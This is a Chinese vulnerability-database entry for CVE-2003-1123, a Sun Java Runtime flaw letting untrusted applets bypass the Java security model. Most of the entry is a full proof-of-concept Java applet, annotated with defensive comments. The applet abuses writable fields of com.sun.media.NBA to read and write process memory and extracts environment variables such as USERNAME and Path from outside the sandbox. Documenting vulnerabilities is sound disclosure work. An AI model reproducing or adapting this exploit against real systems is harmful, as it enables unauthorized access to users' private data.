Sun Microsystems不可信Applet Java安全模型冲突漏洞
漏洞ID | 1107368 | 漏洞类型 | 设计错误 |
发布时间 | 2003-06-05 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2003-1123 |
CNNVD-ID | CNNVD-200312-467 |
漏洞平台 | Multiple | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Solaris系统的Java Runtime Environment(JRE)为Java应用程序提供可靠的运行环境。Java Runtime Environment(JRE)允许不可信Applet从可信Applet中访问信息,远程攻击者可以利用这个漏洞绕过Java安全模型访问受限资源。目前没有详细漏洞细节。
|漏洞EXP
source: http://www.securityfocus.com/bid/7824/info
It has been reported that the Sun Java Runtime Environment does not properly protect trusted java applets. Because of this, it may be possible for an attacker to use a malicious applet to gain access to sensitive information.
/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org
*/
import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
/**
 * Memory-access helpers used by the proof of concept on this page (CVE-2003-1123).
 * Every read and write below goes through {@code com.sun.media.NBA}: the code
 * assigns the {@code data} and {@code size} fields of a freshly constructed NBA
 * directly and then calls {@code copyTo}, so whatever value is placed in
 * {@code data} becomes the source or destination of the copy. The PoC treats
 * {@code data} as a native address (assumed from usage; the NBA class itself is
 * not on this page). No SecurityManager check is involved on this path, which is
 * the contrast that {@code ReadEnv.crash} draws against {@code System.getProperties()}.
 * The defensive point: a Java wrapper around a native buffer must keep its
 * address/length fields private and validate them in the native layer, because
 * writable fields of that kind reachable from untrusted code amount to an
 * unchecked read/write primitive.
 * Every method restores the original {@code data} value before the NBA becomes
 * garbage ("keep the finalizer happy"), which suggests -- not visible here -- that
 * the NBA finalizer releases whatever {@code data} refers to.
 */
class NBAFactory {
/**
 * Returns the zero-terminated text that immediately follows the first
 * occurrence of {@code a} in the range [from, to), or "" when {@code a}
 * is not found there.
 *
 * @param a    text to look for (the name, not the value)
 * @param from first position scanned (inclusive)
 * @param to   first position not scanned (exclusive)
 * @return the text after the match up to the first 0 byte, or "" on no match
 */
public static String getEnv(String a,long from, long to) {
long pos = findMem(a,from,to);
String ret = "";
if (pos != -1) {
// skip past the matched name; whatever follows it (up to a 0 byte) is returned
long pos2 = pos+a.length();
ret = getString(pos2);
}
return ret;
}
/**
 * Reads bytes from {@code pos} onward until a zero byte and returns them as a
 * String. Each byte is cast to char, which sign-extends: values 0x80..0xFF come
 * back as chars 0xFF80..0xFFFF rather than Latin-1. There is no length bound, so
 * an unterminated region is read until a 0 is eventually encountered.
 *
 * @param pos position of the first byte
 * @return the bytes up to (not including) the first 0, one char each
 */
public static String getString(long pos) {
int i = 0;
StringBuffer b = new StringBuffer();
char x = 0;
do {
x = (char) readMem(pos+i);
i++;
if (x != 0)
b.append(x);
} while (!(x == 0));
return b.toString();
}
/**
 * Linear scan for the characters of {@code a} in [from, to).
 * At each candidate position the characters are compared one by one against
 * the byte read via {@link #readMem}; a mismatch abandons that position.
 * Because the read byte is sign-extended to char, only characters below 0x80
 * can match. Each comparison constructs a new NBA, so wide ranges are slow.
 *
 * @param a    text to find
 * @param from first position scanned (inclusive)
 * @param to   first position not scanned (exclusive)
 * @return the position where the match starts, or -1 if absent
 */
public static long findMem(String a, long from , long to) {
char[] ch = a.toCharArray();
for (long pos = from; pos < to ;pos++) {
// System.out.println(pos-from+":");
int i = 0;
int found = 0;
for (i = 0; i < ch.length; i++) {
char x = (char) readMem(pos+i);
// System.out.println(pos+":"+x);
if (x == ch[i]) {
found ++;
}
else
break;
}
if (found == ch.length) {
return pos;
}
}
return -1;
}
/**
 * Reads the single byte at position {@code i}.
 * A fresh 1-element NBA has its {@code data} pointed at {@code i} and
 * {@code size} set to 1; {@code copyTo} fills the one-byte array; the
 * original {@code data} is then put back so the finalizer sees what the
 * constructor produced.
 *
 * @param i position to read
 * @return the byte found there
 */
public static byte readMem(long i) {
byte[] by = new byte[1];
NBA searcher = new NBA(byte[].class,1);
long olddata = searcher.data;
searcher.data = i;
searcher.size = 1;
searcher.copyTo(by);
searcher.data = olddata; // keep the finalizer happy
return by[0];
}
/**
 * Writes the byte value {@code c} at position {@code i} by copying from the
 * NBA that the static initializer left pointing at a byte of that value.
 * {@code theBytes} has exactly 256 entries, so {@code c > 255} throws
 * ArrayIndexOutOfBoundsException. In this PoC the write path is only
 * referenced from commented-out lines in {@code ReadEnv}; nothing executes it.
 *
 * @param i position to write
 * @param c value (0..255) to store
 */
public static void setMem(long i, char c) {
NBA b = new NBA(byte[].class,1);
long olddata = b.data;
b.data = i;
b.size = 1;
theBytes[c].copyTo(b);
b.data = olddata; // keep the finalizer happy
}
/**
 * Overload for a byte value. The cast to char sign-extends, so a negative
 * byte becomes a char above 255 and hits the index error described above.
 */
public static void setMem(long i, byte by) {
setMem(i,(char) by);
}
/**
 * Overload for an int value; same truncation to char as the byte overload.
 */
public static void setMem(long i, int by) {
setMem(i,(char) by);
}
/**
 * Writes the chars of {@code s} at consecutive positions starting at {@code l}.
 * One NBA is reused for every char; its {@code data} is advanced per step and
 * restored only once, after the loop. No terminating 0 is written.
 *
 * @param l position of the first char
 * @param s text to store, one byte per char (each char must be 0..255)
 */
public static void setMem(long l, String s) {
char[] theChars = s.toCharArray();
NBA b = new NBA(byte[].class,1);
long olddata = b.data;
for (int i = 0 ; i < theChars.length; i++) {
b.data = l+i;
b.size = 1;
theBytes[theChars[i]].copyTo(b);
}
b.data = olddata; // keep the finalizer happy
}
// Static-only utility; never instantiated.
private NBAFactory() {
}
/**
 * Returns the NBA positioned at a byte of value {@code i} (index 0..255).
 */
public static NBA getByte(char i) {
return theBytes[i];
}
/**
 * Same as {@link #getByte(char)}; the int is truncated to char before indexing.
 */
public static NBA getByte(int i) {
return theBytes[(char) i];
}
/**
 * Returns the backing array itself, not a copy, so callers can replace entries.
 */
public static NBA[] getBytes() {
return theBytes;
}
// One NBA per byte value 0..255, each left pointing at a location holding that value.
static NBA[] theBytes = new NBA[256];
/**
 * Class-load setup: for every byte value 0..255, finds a location in the
 * hard-coded range [0x6D340000, 0x6D46A000) that holds that value and keeps an
 * NBA pointed at it, so that the setMem overloads have a source byte to copy
 * from. The range is specific to the author's setup; nothing here derives it.
 * If any value is missing the whole JVM is terminated via System.exit(-1) --
 * in the applet case that is the hosting browser's JVM, not just the applet.
 */
static {
for (char i = 0; i < 256; i++) {
// System.out.println((byte)i);
NBA n = search(i,0x6D340000L, 0x6D46A000L);
if (n!=null)
theBytes[i]= n;
else
System.exit(-1);
}
}
/**
 * Scans [start, end) one byte at a time using a single NBA whose {@code data}
 * is advanced each step, and returns that NBA still pointing at the first byte
 * equal to {@code theChar}. Unlike {@link #readMem}, {@code data} is
 * deliberately not restored here: the caller keeps the positioned handle.
 * {@code size} is left at whatever the constructor set.
 *
 * @param theChar value to look for (compared as a byte)
 * @param start   first position scanned (inclusive)
 * @param end     first position not scanned (exclusive)
 * @return the positioned NBA, or null if the value does not occur in the range
 */
static NBA search (char theChar,long start, long end) {
NBA ret = null;
NBA searcher = new NBA(byte[].class,1);
byte[] ba = new byte[1];
for (long i = start; i < end ; i++) {
// byte b = readMem(i);
searcher.data = i;
searcher.copyTo(ba);
// if ( b == (byte)theChar) {
if ( ba[0] == (byte)theChar) {
return searcher;
}
}
return null;
}
}
/**
 * Entry point of the proof of concept, runnable both as a plain program
 * ({@link #main}) and as an applet ({@link #paint}). Both paths call
 * {@link #crash(Object)}, which reads process memory through
 * {@code NBAFactory} and then attempts the sanctioned
 * {@code System.getProperties()} call; the caught AccessControlException on
 * the second path is what shows that the sandbox only guards the API, not the
 * NBA field access. Loading this class also triggers the NBAFactory static
 * initializer, which may call System.exit(-1).
 */
public class ReadEnv extends Applet{
// Allocated once at class load; its data value is the start of the 32 KiB scan window in crash().
static NBA base = new NBA(byte[].class,18); // what's the base pointer ?
/**
 * Runs the demonstration. Prints the banner and {@code base.data} in hex, then
 * for each name in {@code envs} scans [base.data, base.data + 32768) and reports
 * the text that follows it -- on stdout when {@code o} is not an Applet, in a
 * JOptionPane dialog when it is. Afterwards it tries {@code System.getProperties()}
 * and prints, rather than rethrows, the AccessControlException the sandbox
 * raises, so the contrast between the two paths is visible in the output.
 * {@code ret} is allocated but only used by the commented-out tail, which is
 * the author's experimentation and is never executed; its {@code data} is
 * restored unchanged at the end.
 *
 * @param o the running Applet, or null when started from main
 */
public static void crash(Object o) {
System.out.println("Proof-Of-Concept: Read Environment via vulnerability Java Media Framework");
System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");
NBA ret = new NBA(byte[].class,4);
long oldret = ret.data;
System.out.println("Base of data: "+Long.toString(base.data,16));
// Names searched for in the scan window; getEnv returns the text right after each match.
String[] envs = {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
"TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};
for (int i = 0; i < envs.length; i++) {
String val = NBAFactory.getEnv(envs[i],base.data,base.data+32768);
if (!(o instanceof Applet)) {
System.out.println(envs[i]+":"+val);
}
else {
javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,envs[i]+":"+val);
}
}
//NBAFactory.setMem(pos+10,'A');
// The sanctioned route: under an applet SecurityManager this is expected to be denied.
try {
System.out.println(System.getProperty("java.class.path"));
java.util.Properties p = System.getProperties();
p.list(System.out);
}
catch (java.security.AccessControlException e) {
System.out.println("Cannot read environment via getProperties:"+e);
}
//System.out.println(pos);
//long pos2 = NBAFactory.findMem("mixed",base.data,base.data+6614096);
//System.out.println(pos2);
//byte[] x11 = new byte[8];
//ret.copyTo(x11);
//for (int i = 0; i < x11.length; i++) {
// System.out.println(i+":"+x11[i]+(char)x11[i]);
//}
ret.data = oldret;
//ret.data = 0xffff8000;
//ret.finalize();
//ret.finalize();
//NBAFactory.setMem(ret.data-0xffff8000,33);
//ret.finalize();
/*b.data = base.data;
b.size = 16384;*/
/*byte[] ba3 = new byte[16384];
b.copyTo(ba3);
for (int i = 0; i < ba3.length; i++) {
System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)ba3[i]);
}*/
/*b.data = olddata;*/
}
/**
 * Console entry point: runs the demonstration with no applet context, so all
 * output goes to stdout.
 */
public static void main(String[] a) {
crash(null);
}
/**
 * Applet hook: runs the demonstration once, guarded by the static {@code init}
 * flag so repeated repaints do not run it again.
 */
public void paint(Graphics g) {
if (init == 0) {
init=1;
crash(this);
}
}
// Declared after its use in paint(); static, so the once-only guard is shared by every instance in this JVM.
static int init = 0;
}
|参考资料
来源:US-CERT Vulnerability Note:VU#393292
名称:VU#393292
链接:http://www.kb.cert.org/vuls/id/393292
来源:BID
名称:7824
链接:http://www.securityfocus.com/bid/7824
来源:SUNALERT
名称:55100
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-55100-1
来源:XF
名称:sun-applet-access-information(12189)
链接:http://xforce.iss.net/xforce/xfdb/12189
来源:SECTRACK
名称:1006935
链接:http://securitytracker.com/id?1006935
来源:SECUNIA
名称:8958
链接:http://secunia.com/advisories/8958
来源:NSFOCUS
名称:4934
链接:http://www.nsfocus.net/vulndb/4934